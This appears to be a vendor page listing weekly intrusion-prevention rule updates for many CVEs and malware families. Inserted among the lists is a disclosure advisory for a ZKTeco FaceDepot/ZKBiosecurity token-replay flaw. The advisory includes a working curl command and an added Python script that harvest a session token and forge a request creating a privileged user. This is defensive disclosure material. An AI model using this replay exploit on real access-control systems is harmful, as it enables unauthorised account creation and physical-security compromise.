All Vulnerabilities

  • 21-020 (April 27, 2021)
     Publish Date:  28 April 2021
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    Asterisk Manager Interface (AMI) HTTP
    1009148* - Asterisk HTTP Server Denial Of Service Vulnerability (CVE-2018-7287)


    Directory Server LDAP
    1010895 - OpenLDAP Slapd CancelRequest Denial Of Service Vulnerability (CVE-2020-36227)


    Web Application Common
    1010899* - LightCMS Stored Cross-Site Scripting Vulnerability (CVE-2021-3355)
    1010918 - Nagios XI Remote Code Execution Vulnerability (CVE-2020-35578)


    Web Client Common
    1010917 - Chromium Based Browsers Improper Input Validation Vulnerability (CVE-2021-21123)
    1010910 - Chromium V8 Out-Of-Bounds Access Remote Code Execution Vulnerability (CVE-2021-21220)
    1010922 - Google Chrome Out Of Bounds Write Vulnerability (CVE-2020-6507)
    1010908 - Microsoft 3D Builder Remote Code Execution Vulnerability (ZDI-21-406)
    1010907 - Microsoft Print 3D Remote Code Execution Vulnerability (ZDI-21-405)
    1010924 - Microsoft Windows Remote Code Execution Vulnerability (CVE-2021-28468)
    1010925 - XStream Library Arbitrary Code Execution Vulnerability (CVE-2021-21351)


    Web Server Apache
    1009087* - Apache Httpd FilesMatch Directive Security Restriction Bypass Vulnerability (CVE-2017-15715)


    Web Server Common
    1010902* - Apache Druid Remote Code Execution Vulnerability (CVE-2021-26919)
    1010905* - B2evolution CMS Open Redirect Vulnerability (CVE-2020-22840)


    Web Server HTTPS
    1010913* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26858)


    Web Server Miscellaneous
    1010916 - Atlassian Jira Information Disclosure Vulnerability (CVE-2019-3403)
    1010893 - Jenkins 'Repository Connector' Plugin Stored Cross-Site Scripting Vulnerability (CVE-2021-21618)
    1008763* - Red Hat JBoss Application Server 'doFilter' Insecure Deserialization Vulnerability (CVE-2017-12149)


    Zoho ManageEngine
    1010903 - Zoho ManageEngine Applications Manager Custom Monitor Type SQL Injection Vulnerability


    Integrity Monitoring Rules:

    There are no new or updated Integrity Monitoring Rules in this Security Update.


    Log Inspection Rules:

    1002831* - Unix - Syslog
  • 21-019 (April 20, 2021)
     Publish Date:  22 April 2021
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    Asterisk Manager Interface (AMI) HTTP
    1009148 - Asterisk HTTP Server Denial Of Service Vulnerability (CVE-2018-7287)


    HP Intelligent Management Center (IMC)
    1010889* - Apache OFBiz Unsafe Deserialization Vulnerability (CVE-2021-26295)


    Mail Server Common
    1010001* - Dovecot And Pigeonhole Remote Code Execution Vulnerability (CVE-2019-11500)


    Microsoft Office
    1010909 - Microsoft Excel Remote Code Execution Vulnerability (CVE-2021-28454)
    1010914 - Microsoft Word Remote Code Execution Vulnerability (CVE-2021-28453)


    Web Application Common
    1010899 - LightCMS Stored Cross-Site Scripting Vulnerability (CVE-2021-3355)


    Web Client Common
    1010904 - Google Chrome Insufficient Data Validation Vulnerability (CVE-2020-16040)


    Web Client Internet Explorer/Edge
    1010857* - Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2021-26411)
    1010912 - Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2021-26411) -1


    Web Server Common
    1010902 - Apache Druid Remote Code Execution Vulnerability (CVE-2021-26919)
    1010905 - B2evolution CMS Open Redirect Vulnerability (CVE-2020-22840)
    1010892* - B2evolution CMS Reflected Cross Site Scripting Vulnerability (CVE-2020-22839)
    1010885* - CMS Made Simple Smarty Server-side Template Injection Vulnerability (CVE-2021-26120)


    Web Server HTTPS
    1010913 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26858)


    Integrity Monitoring Rules:

    1006683* - TMTR-0016: Suspicious Running Processes Detected


    Log Inspection Rules:

    There are no new or updated Log Inspection Rules in this Security Update.
  • 21-017 (April 13, 2021)
     Publish Date:  14 April 2021
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    DCERPC Services
    1010900 - Microsoft Windows SMB Information Disclosure Vulnerability (CVE-2021-28325)


    HP Intelligent Management Center (IMC)
    1010889 - Apache OFBiz Unsafe Deserialization Vulnerability (CVE-2021-26295)


    Suspicious Client Ransomware Activity
    1010732* - Identified FlawedGrace Checkin Request - Client


    Suspicious Server Ransomware Activity
    1010733* - Identified FlawedGrace Checkin Request - Server


    Web Application PHP Based
    1010886* - Batflat CMS Remote Code Execution Vulnerability (CVE-2020-35734)


    Web Application Tomcat
    1009697* - Apache Tomcat Remote Code Execution Vulnerability (CVE-2019-0232)


    Web Client Common
    1010806* - Identified Directory Traversal Attack In HTTP Response Headers
    1010898 - Microsoft Windows Win32k Elevation Of Privilege Vulnerability (CVE-2021-28310)


    Web Client Internet Explorer/Edge
    1010888 - Microsoft Edge Memory Corruption Vulnerability (CVE-2017-11799)
    1010896 - Microsoft Edge Memory Corruption Vulnerability (CVE-2017-8755)


    Web Server Common
    1010892 - B2evolution CMS Reflected Cross Site Scripting Vulnerability (CVE-2020-22839)
    1010885 - CMS Made Simple Smarty Server-side Template Injection Vulnerability (CVE-2021-26120)
    1010871* - Cisco Data Center Network Manager Arbitrary File Upload Vulnerability (CVE-2019-1620)
    1010874 - Identified Cisco Data Center Network Manager Authentication Bypass Attempt
    1010891 - Identified Cisco Data Center Network Manager Information Disclosure Vulnerability (CVE-2019-1622)
    1010755* - SAP Solution Manager Remote Code Execution Vulnerability (CVE-2020-6207)


    Integrity Monitoring Rules:

    There are no new or updated Integrity Monitoring Rules in this Security Update.


    Log Inspection Rules:

    1002798* - Database Server - PostgreSQL
  • 21-016 (April 6, 2021)
     Publish Date:  07 April 2021
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    DNS Client
    1010784* - DNSmasq DNSSEC Out Of Bounds Write Vulnerability (CVE-2020-25687)


    DNS Server
    1010613* - Identified DNS Trojan.Win32.Trickbot.Dns Traffic


    Suspicious Client Application Activity
    1010741* - Identified HTTP Backdoor Python FreakOut A Runtime Detection


    Suspicious Client Ransomware Activity
    1010792* - Identified Cobalt Strike Default Self-signed SSL/TLS Certificate
    1010597* - Identified HTTP Cobalt Strike Malleable C&C Traffic Response (Office 365 Calendar Profile)
    1010596* - Identified HTTP Cobalt Strike Malleable C&C Traffic Response (YouTube Profile)
    1010714* - Identified HTTP Trojan-Downloader.Win32.Cometer.bfc C&C Traffic Request
    1010617* - Identified TLS Cobalt Strike Beacon (Certificate)


    Suspicious Server Ransomware Activity
    1010638* - Identified FTP Backdoor.Win32.Qbot.JINX Runtime Detection
    1010616* - Identified HTTP Backdoor.Shell.Powertrick.A Runtime Detection
    1010608* - Identified HTTP Cobalt Strike Malleable C&C Traffic Request (Amazon Profile)
    1010637* - Identified HTTP Cobalt Strike Malleable C&C Traffic Request (Google Safe Browsing Profile)
    1010609* - Identified HTTP Cobalt Strike Malleable C&C Traffic Request (Office 365 Calendar Profile)
    1010636* - Identified HTTP Cobalt Strike Malleable C&C Traffic Request (Pandora GET Profile)
    1010639* - Identified HTTP Cobalt Strike Malleable C&C Traffic Request (Pandora POST Profile)
    1010731* - Identified HTTP Redhat Webshell C&C Traffic
    1010614* - Identified HTTP Trickbot Data Exfiltration (Card Payment)
    1010615* - Identified HTTP Trickbot Data Exfiltration (Network Module)
    1010634* - Identified HTTP Trickbot Data Exfiltration - (Application Credentials Grabber)
    1010644* - Identified HTTP Trojan-Downloader.Shell.Lightbot.A C&C Traffic Request
    1010610* - Identified HTTP Trojan.Win64.BazarTrickbot Traffic
    1010611* - Identified HTTP TrojanDownloader.Win64.BazarLoader Traffic
    1010607* - Identified TCP Meterpreter Payload


    Web Application PHP Based
    1010886 - Batflat CMS Remote Code Execution Vulnerability (CVE-2020-35734)


    Web Client Common
    1010806 - Identified Directory Traversal Attack In HTTP Response Headers


    Web Server Common
    1010867* - Apache ActiveMQ Web Console Reflected Cross-Site Scripting Vulnerability (CVE-2020-13947)
    1010871 - Cisco Data Center Network Manager Arbitrary File Upload Vulnerability (CVE-2019-1620)
    1010734* - Identified BumbleBee Webshell Traffic Over HTTP
    1010814 - Identified SAP Solution Manager Removal On Host Attempt (ATT&CK T1070.004)


    Web Server HTTPS
    1010868* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065)
    1010870* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065) - 1
    1010875* - rConfig 'vendor.crud.php' Arbitrary File Upload Vulnerability (CVE-2020-12255)


    Web Server Oracle
    1010887 - Identify Oracle Application Server Config Files Access


    Windows SMB Server
    1010884* - Microsoft Windows RPC Remote Code Execution Vulnerability (CVE-2017-8461)


    Integrity Monitoring Rules:

    There are no new or updated Integrity Monitoring Rules in this Security Update.


    Log Inspection Rules:

    There are no new or updated Log Inspection Rules in this Security Update.
  • 21-014 (March 23, 2021)
     Publish Date:  05 April 2021
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    Microsoft Office
    1010879 - Microsoft Excel XLS File Parsing Use-After-Free Remote Code Execution Vulnerability (CVE-2021-27053)
    1010878 - Microsoft Excel XLS File Parsing Use-After-Free Remote Code Execution Vulnerability (CVE-2021-27054)
    1010880 - Microsoft Office Graph Uninitialized Variable Remote Code Execution Vulnerability (CVE-2021-27057)
    1010881 - Microsoft PowerPoint PPTX File Parsing Use-After-Free Remote Code Execution Vulnerability (CVE-2021-27056)


    Oracle E-Business Suite Web Interface
    1010730* - Oracle E-Business Suite 'ozfVendorLov' SQL Injection Information Disclosure Vulnerability (CVE-2020-14876)


    Web Server Common
    1010796* - Apache Druid Remote Code Execution Vulnerability (CVE-2021-25646)


    Web Server HTTPS
    1010868 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065)
    1010870 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065) - 1


    Web Server Nagios
    1010866* - Nagios XI Cross Site Scripting Vulnerability (CVE-2021-25299)


    Web Server Oracle
    1010590* - Oracle WebLogic Server Remote Code Execution Vulnerabilities (CVE-2020-14882, CVE-2020-14750 and CVE-2020-14883)


    Web Server SharePoint
    1010823 - Identified Microsoft SharePoint GetPermissionCollection Request (ATT&CK T1069, T1087, T1213.002, T1589.002, T1589.003)
    1010864* - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2021-27076)


    Integrity Monitoring Rules:

    There are no new or updated Integrity Monitoring Rules in this Security Update.


    Log Inspection Rules:

    There are no new or updated Log Inspection Rules in this Security Update.
  • 21-013 (March 16, 2021)
     Publish Date:  05 April 2021
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    DNS Client
    1010766* - Identified Non Existing DNS Resource Record (RR) Types In DNS Traffic


    DNS Server
    1010863* - Microsoft Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-26877)
    1010865* - Microsoft Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-26897)


    Oracle E-Business Suite Web Interface
    1010730 - Oracle E-Business Suite 'ozfVendorLov' SQL Injection Information Disclosure Vulnerability (CVE-2020-14876)


    SSL Client
    1010410* - OpenSSL Large DH Parameter Denial Of Service Vulnerability (CVE-2018-0732)


    Suspicious Server Ransomware Activity
    1010647* - Identified HTTP Backdoor.Win32.Cobalt.SMHP C&C Traffic Request


    Web Application PHP Based
    1010852* - phpMyAdmin 'SearchController' SQL Injection Vulnerability (CVE-2020-26935)


    Web Server Common
    1010862* - SaltStack Salt Directory Traversal Vulnerability (CVE-2021-25282)
    1010858* - SaltStack Salt Directory Traversal Vulnerability (CVE-2021-25282) - 1


    Web Server HTTPS
    1010849 - Identified Zoom WebSocket Upgrade Request
    1010854* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855)


    Web Server Miscellaneous
    1010682* - SolarWinds Orion Platform 'SaveUserSetting' Privilege Escalation Vulnerability (CVE-2021-27258)


    Web Server Nagios
    1010866 - Nagios XI Cross Site Scripting Vulnerability (CVE-2021-25299)


    Web Server SharePoint
    1010864* - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2021-27076)


    Windows SMB Server
    1007065* - Executable File Uploaded On Network Share (ATT&CK T1105)


    Integrity Monitoring Rules:

    There are no new or updated Integrity Monitoring Rules in this Security Update.


    Log Inspection Rules:

    There are no new or updated Log Inspection Rules in this Security Update.
  • 21-015 (March 30, 2021)
     Publish Date:  05 April 2021
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    Oracle E-Business Suite Web Interface
    1010730* - Oracle E-Business Suite 'ozfVendorLov' SQL Injection Information Disclosure Vulnerability (CVE-2020-14876)


    Web Client Common
    1010877 - Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB21-09) - 4


    Web Client HTTPS
    1010132* - Microsoft Windows CryptoAPI Spoofing Vulnerability (CVE-2020-0601) - 1


    Web Server Common
    1010867 - Apache ActiveMQ Web Console Reflected Cross-Site Scripting Vulnerability (CVE-2020-13947)


    Web Server HTTPS
    1010868* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065)
    1010870* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065) - 1
    1010850* - VMware vCenter Server Remote Code Execution Vulnerability (CVE-2021-21972 and CVE-2021-21973)
    1010875 - rConfig 'vendor.crud.php' Arbitrary File Upload Vulnerability (CVE-2020-12255)


    Windows SMB Server
    1010884 - Microsoft Windows RPC Remote Code Execution Vulnerability (CVE-2017-8461)


    Integrity Monitoring Rules:

    1010855* - Microsoft Exchange - HAFNIUM Targeted Vulnerabilities


    Log Inspection Rules:

    There are no new or updated Log Inspection Rules in this Security Update.
  • Lack of mutual authentication in ZKTeco FaceDepot 7B 1.0.213 and ZKBiosecurity Server 1.0.0_20190723 allows an attacker to obtain a long-lasting token by impersonating the server.

    The vulnerability was submitted to ZDI on Dec 3, 2019.

    ZDI received one response from the vendor, which acknowledged but did not confirm the vulnerability. The responsible-disclosure window expired on April 30, 2020.

    The vendor has since addressed the vulnerability and recommends installing the updated version of the software, available via the vendor's link under Reference below.

    Details

    The researchers used two ways to steal the access token carried in the HTTP header:

    1. Use a Python script (zkteco.py) with a self-signed SSL certificate to simulate ZKBiosecurity Server (ADMS), and ARP-spoof the server's address so the tablet connects to the fake server on HTTPS port 8088.
    2. Capture the default deployment with Wireshark; out of the box the tablet talks plain HTTP rather than HTTPS, so the token is visible on the wire.

    We found no CSRF protection or other mechanism that would prevent a captured request from being replayed. Moreover, the token has a long life (at least 2 weeks) and remains valid even after the FaceDepot 7B (the Android tablet) starts using a new token. The token can be used for replay attacks, command forgery, arbitrary user creation and privilege escalation (CVE-2020-17474).

    We wrote a proof-of-concept that simulates ZKBiosecurity ADMS with plausible dummy responses. Its SSL certificate is self-signed and we did not install the CA on the tablet; the tablet accepted it anyway. After taking over ZKBiosecurity Server's IP address by ARP spoofing, the script obtains the token for further use. The FaceDepot tablet reconnects to the server every 2 to 3 minutes and automatically submits a valid token on each connection.

    Once the SN and token are obtained, it is easy to, for example, create a user with cURL:

    curl -v -L -X POST -A 'iClock Proxy/1.09' 'http://192.168.0.1:8088/iclock/cdata?SN=LSR1915060003&table=tabledata&tablename=user&count=1' \
        -b 'token=a72182ceb8e4695ea84300155953566d' -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \
        -H 'Content-Type: application/push;charset=UTF-8' -H 'Content-Language: zh-CN' -d@bugoy.user.post

    Where bugoy.user.post contains a single tab-separated record:

    user uuid=	cardno=	pin=11111	password=	group=1	starttime=0 	endtime=0	name=Bugoy Test1	privilege=14	disable=0	verify=0
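    The two steps above, harvesting the SN and token that the tablet volunteers on every checkin and then replaying them to push a new user, in one script. This is an added example, not the researchers' zkteco.py and not ZKTeco code. It assumes the tablet's own checkin carries the SN in the query string and the token in a `token` cookie, exactly as the replayed cURL request does; the captured request below is constructed, and the host, SN, token and user record are the advisory's own example values.

```python
"""Harvest and replay the FaceDepot -> ZKBiosecurity session token.

Added example modelled on the cURL request and bugoy.user.post shown in the
advisory; it is not the researchers' zkteco.py.  The checkin sample below is
constructed, and the assumption that the tablet's own checkin carries SN in
the query string and the token in a 'token' cookie is taken from that
replayed request, not from a capture.
"""
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit

# Constructed sample of what a rogue ADMS (or a Wireshark capture of the
# plain-HTTP default) sees from the tablet.  Assumption: same header shape
# as the advisory's replayed POST.
SAMPLE_CHECKIN = (
    b"GET /iclock/cdata?SN=LSR1915060003&type=time HTTP/1.1\r\n"
    b"Host: 192.168.0.1:8088\r\n"
    b"User-Agent: iClock Proxy/1.09\r\n"
    b"Cookie: token=a72182ceb8e4695ea84300155953566d\r\n"
    b"Accept: application/push\r\n"
    b"\r\n"
)

# Field order of the tab-separated user record in bugoy.user.post.
USER_FIELDS = ("uuid", "cardno", "pin", "password", "group", "starttime",
               "endtime", "name", "privilege", "disable", "verify")


def parse_checkin(raw: bytes) -> dict:
    """Pull SN and session token out of one raw HTTP request.  This is all a
    fake server has to do: the tablet volunteers both on every checkin."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("utf-8", "replace").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    cookie = SimpleCookie()
    cookie.load(headers.get("cookie", ""))
    return {
        "method": method,
        "path": parts.path,
        "sn": query.get("SN", [None])[0],
        "token": cookie["token"].value if "token" in cookie else None,
        "user_agent": headers.get("user-agent"),
        "body": body,
    }


def build_user_record(pin: str, name: str, privilege: int = 14, **extra) -> str:
    """Serialise one user row in the 'user k=v<TAB>k=v...' form of
    bugoy.user.post.  privilege=14 is the value the advisory's record uses."""
    unknown = set(extra) - set(USER_FIELDS)
    if unknown:
        raise ValueError(f"unknown user fields: {sorted(unknown)}")
    values = dict.fromkeys(USER_FIELDS, "")
    values.update(group="1", starttime="0", endtime="0", disable="0", verify="0")
    values.update(extra)
    values.update(pin=pin, name=name, privilege=str(privilege))
    return "user " + "\t".join(f"{f}={values[f]}" for f in USER_FIELDS)


def build_replay_request(host: str, sn: str, token: str, record: str) -> bytes:
    """Raw HTTP POST equivalent to the advisory's cURL command: a harvested
    token plus SN is enough to push a new user to the real server."""
    payload = record.encode("utf-8")
    target = f"/iclock/cdata?SN={sn}&table=tabledata&tablename=user&count=1"
    head = (
        f"POST {target} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "User-Agent: iClock Proxy/1.09\r\n"
        "Accept: application/push\r\n"
        "Accept-Charset: UTF-8\r\n"
        "Accept-Language: zh-CN\r\n"
        "Content-Type: application/push;charset=UTF-8\r\n"
        "Content-Language: zh-CN\r\n"
        f"Cookie: token={token}\r\n"
        f"Content-Length: {len(payload)}\r\n"
        "\r\n"
    )
    return head.encode("ascii") + payload


if __name__ == "__main__":
    seen = parse_checkin(SAMPLE_CHECKIN)
    print(f"harvested SN={seen['sn']} token={seen['token']}")
    forged = build_replay_request("192.168.0.1:8088", seen["sn"], seen["token"],
                                  build_user_record("11111", "Bugoy Test1"))
    print(forged.decode())
```

    The script touches no network: feed `parse_checkin` a request captured with Wireshark (method 2) or received by a rogue server (method 1), and `build_replay_request` produces the same bytes the cURL command sends. Because the server never authenticates to the tablet and the token is not bound to a short session, nothing in the exchange distinguishes this forged POST from a genuine one.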

    Vulnerability Type

    • CWE-613: Insufficient Session Expiration
    • CWE-295: Improper Certificate Validation

    Attack Type

    Remote

    Impact

    Information Disclosure

    Attack Vectors


    An attacker who can sniff the network, or ARP-spoof the server's address and stand up a fake server, obtains a long-lasting token.

    Mitigation

    • Deploy a firewall in front of ZKBiosecurity Server and enforce an allowed-IP list and an allowed-MAC list.
    • Deny all access not on those lists.

    Discoverer


    Roel Reyes, Joey Costoya, Philippe Lin, Vincenzo Ciancaglini, Morton Swimmer

    Reference

    https://www.zkteco.com/en/product_detail/FaceDepot-7B.html
  • 21-012 (March 11, 2021)
     Publish Date:  12 March 2021
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    Web Server Miscellaneous
    1010670* - Apache Struts2 Remote Code Execution Vulnerability (CVE-2020-17530)


    Integrity Monitoring Rules:

    There are no new or updated Integrity Monitoring Rules in this Security Update.


    Log Inspection Rules:

    There are no new or updated Log Inspection Rules in this Security Update.
  • 21-011 (March 9, 2021)
     Publish Date:  10 March 2021
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    DNS Server
    1010863 - Microsoft Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-26877)
    1010865 - Microsoft Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-26897)


    Directory Server LDAP
    1010820* - OpenLDAP Slapd SASL Proxy Authorization Denial Of Service Vulnerability (CVE-2020-36222)


    SolarWinds Orion Platform
    1010810* - SolarWinds Orion Platform Insecure Deserialization Vulnerability (CVE-2021-25274)


    Web Application Common
    1010818* - WordPress 'Code Snippets' Plugin Cross-Site Request Forgery Vulnerability (CVE-2020-8417)


    Web Application PHP Based
    1010852 - phpMyAdmin 'SearchController' SQL Injection Vulnerability (CVE-2020-26935)


    Web Client Common
    1010861 - Microsoft Windows Graphics Component Remote Code Execution Vulnerability (CVE-2021-24093)


    Web Client Internet Explorer/Edge
    1010857 - Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2021-26411)


    Web Server Common
    1010801* - FCKeditor Plugin Arbitrary File Upload Vulnerability (CVE-2009-2265)
    1010862 - SaltStack Salt Directory Traversal Vulnerability (CVE-2021-25282)
    1010858 - SaltStack Salt Directory Traversal Vulnerability (CVE-2021-25282) - 1


    Web Server HTTPS
    1010854* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855)
    1010850* - VMware vCenter Server Remote Code Execution Vulnerability (CVE-2021-21972)


    Web Server Miscellaneous
    1010496* - Apache Struts2 File Upload Denial of Service Vulnerability (CVE-2019-0233)
    1010461* - Apache Struts2 Remote Code Execution Vulnerability (CVE-2019-0230)
    1010670* - Apache Struts2 Remote Code Execution Vulnerability (CVE-2020-17530)
    1010682 - SolarWinds Orion Platform 'SaveUserSetting' Privilege Escalation Vulnerability (CVE-2021-27258)


    Web Server Oracle
    1010851 - Identified Oracle Application Server 'OWA_UTIL PL/SQL' Package Access


    Web Server SharePoint
    1010836 - Identified Microsoft SharePoint GetGroupCollection Request (ATT&CK T1589, T1213.002, T1087)
    1010835 - Identified Microsoft SharePoint GetGroupCollectionFromRole Request (ATT&CK T1589, T1213.002, T1087, T1069)
    1010834 - Identified Microsoft SharePoint GetGroupCollectionFromSite Request (ATT&CK T1589, T1213.002, T1087, T1069)
    1010833 - Identified Microsoft SharePoint GetGroupCollectionFromUser Request (ATT&CK T1589, T1213.002, T1087, T1069)
    1010832 - Identified Microsoft SharePoint GetGroupCollectionFromWeb Request (ATT&CK T1589, T1213.002, T1087, T1069)
    1010831 - Identified Microsoft SharePoint GetGroupInfo Request (ATT&CK T1589, T1213.002, T1087, T1069)
    1010830 - Identified Microsoft SharePoint GetRoleCollection Request (ATT&CK T1589, T1213.002, T1087, T1069)
    1010864 - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2021-27076)


    Zoho ManageEngine
    1010811* - Zoho ManageEngine Applications Manager SQL Injection Vulnerability (CVE-2020-35765)


    Integrity Monitoring Rules:

    1010855* - Microsoft Exchange - HAFNIUM Targeted Vulnerabilities


    Log Inspection Rules:

    There are no new or updated Log Inspection Rules in this Security Update.